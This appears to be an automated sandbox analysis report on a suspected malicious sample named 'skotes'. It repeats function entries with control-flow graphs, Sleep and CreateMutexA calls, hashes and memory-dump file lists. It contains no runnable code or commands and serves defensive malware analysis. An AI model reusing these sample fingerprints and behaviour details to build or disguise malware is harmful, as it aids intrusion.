                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID: T2v
                                                                                                                                                                                                • API String ID: 1464230837-3236093702
                                                                                                                                                                                                • Opcode ID: dbce5cbea4b12a24be544f19896c252e591a2a35e96878c590b2eec449933b99
                                                                                                                                                                                                • Instruction ID: 43b2c903d199e847c379d1cec90f96070e3a0f498b994bc249caac34db658e3b
                                                                                                                                                                                                • Opcode Fuzzy Hash: dbce5cbea4b12a24be544f19896c252e591a2a35e96878c590b2eec449933b99
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F312A31B10304EBEB18DB78DD8DBADB7B1EB85314F248318E4149B2D2D77D99808762
                                                                                                                                                                                                Function 0070A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 202 70a682-70a6a2 206 70a6d0-70a6ec 202->206 207 70a6a4-70a6b0 202->207 208 70a71a-70a739 206->208 209 70a6ee-70a6fa 206->209 210 70a6b2-70a6c0 207->210 211 70a6c6-70a6cd call 71d663 207->211 216 70a767-70a916 call 7180c0 208->216 217 70a73b-70a747 208->217 214 70a710-70a717 call 71d663 209->214 215 70a6fc-70a70a 209->215 210->211 212 70a949 210->212 211->206 218 70a94e 212->218 219 70a949 call 736c6a 212->219 214->208 215->212 215->214 223 70a749-70a757 217->223 224 70a75d-70a764 call 71d663 217->224 227 70a953-70a994 Sleep CreateMutexA 218->227 228 70a94e call 736c6a 218->228 219->218 223->212 223->224 224->216 234 70a996-70a998 227->234 235 70a9a7-70a9a8 227->235 228->227 234->235 236 70a99a-70a9a5 234->236 236->235
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0070A963
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00763254), ref: 0070A981
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID: T2v
                                                                                                                                                                                                • API String ID: 1464230837-3236093702
                                                                                                                                                                                                • Opcode ID: 4d415f91dd1aa784ee439d07b82931811514a5c86db8f821803b6ccf6822c373
                                                                                                                                                                                                • Instruction ID: f13d464face7d30721fab97b2590bc3f6046ee300bbc0eb015a36a4f6d37201d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d415f91dd1aa784ee439d07b82931811514a5c86db8f821803b6ccf6822c373
                                                                                                                                                                                                • Instruction Fuzzy Hash: 44312A31B10304EBEB18DB7CDD8DB6DB7B2EB85310F248718E0149B2D6D77D59808662
                                                                                                                                                                                                Function 00709ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 238 709adc-709ae8 239 709aea-709af8 238->239 240 709afe-709b27 call 71d663 238->240 239->240 241 70a917 239->241 248 709b55-709b57 240->248 249 709b29-709b35 240->249 244 70a953-70a994 Sleep CreateMutexA 241->244 245 70a917 call 736c6a 241->245 250 70a996-70a998 244->250 251 70a9a7-70a9a8 244->251 245->244 254 709b65-709d91 call 717a00 call 705c10 call 708b30 call 718220 call 717a00 call 705c10 call 708b30 call 718220 248->254 255 709b59-70a916 call 7180c0 248->255 252 709b37-709b45 249->252 253 709b4b-709b52 call 71d663 249->253 250->251 257 70a99a-70a9a5 250->257 252->241 252->253 253->248 257->251
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0070A963
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00763254), ref: 0070A981
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID: T2v
                                                                                                                                                                                                • API String ID: 1464230837-3236093702
                                                                                                                                                                                                • Opcode ID: 0f7df0a7751de130518e721221ab1a3582b9656e030ba1bb31159423a79ffe0c
                                                                                                                                                                                                • Instruction ID: bbe8a97561bf71d7068fdfbfbc69a881258bfd9afe963c6462e3cf7a16a138f5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f7df0a7751de130518e721221ab1a3582b9656e030ba1bb31159423a79ffe0c
                                                                                                                                                                                                • Instruction Fuzzy Hash: B7214C71714300EBEB189B6CDDCD76DB7A1EBD5310F204319E5089B2D6D77D5980CA52
                                                                                                                                                                                                Function 0070A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 315 70a856-70a86e 316 70a870-70a87c 315->316 317 70a89c-70a89e 315->317 320 70a892-70a899 call 71d663 316->320 321 70a87e-70a88c 316->321 318 70a8a0-70a8a7 317->318 319 70a8a9-70a8b1 call 707d30 317->319 323 70a8eb-70a916 call 7180c0 318->323 331 70a8b3-70a8bb call 707d30 319->331 332 70a8e4-70a8e6 319->332 320->317 321->320 325 70a94e 321->325 328 70a953-70a987 Sleep CreateMutexA 325->328 329 70a94e call 736c6a 325->329 334 70a98e-70a994 328->334 329->328 331->332 340 70a8bd-70a8c5 call 707d30 331->340 332->323 336 70a996-70a998 334->336 337 70a9a7-70a9a8 334->337 336->337 339 70a99a-70a9a5 336->339 339->337 340->332 344 70a8c7-70a8cf call 707d30 340->344 344->332 347 70a8d1-70a8d9 call 707d30 344->347 347->332 350 70a8db-70a8e2 347->350 350->323
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0070A963
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00763254), ref: 0070A981
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID: T2v
                                                                                                                                                                                                • API String ID: 1464230837-3236093702
                                                                                                                                                                                                • Opcode ID: 9054bd1922ebf69148f67c56adba4bacfe7d6536e184f97f2ac4d80f4729de1d
                                                                                                                                                                                                • Instruction ID: b181d7ab4651ad064bacb7c8826a0c2d1d29e83162d5d24d5b98542c9477f5dc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9054bd1922ebf69148f67c56adba4bacfe7d6536e184f97f2ac4d80f4729de1d
                                                                                                                                                                                                • Instruction Fuzzy Hash: FD216D71755301EBE729A7688C9EB6DB2D19F91300F248A16E544962D2DBBE5880C193
                                                                                                                                                                                                Function 0070A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 292 70a34f-70a35b 293 70a371-70a39a call 71d663 292->293 294 70a35d-70a36b 292->294 300 70a3c8-70a916 call 7180c0 293->300 301 70a39c-70a3a8 293->301 294->293 295 70a93a 294->295 297 70a953-70a994 Sleep CreateMutexA 295->297 298 70a93a call 736c6a 295->298 307 70a996-70a998 297->307 308 70a9a7-70a9a8 297->308 298->297 302 70a3aa-70a3b8 301->302 303 70a3be-70a3c5 call 71d663 301->303 302->295 302->303 303->300 307->308 311 70a99a-70a9a5 307->311 311->308
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0070A963
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00763254), ref: 0070A981
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
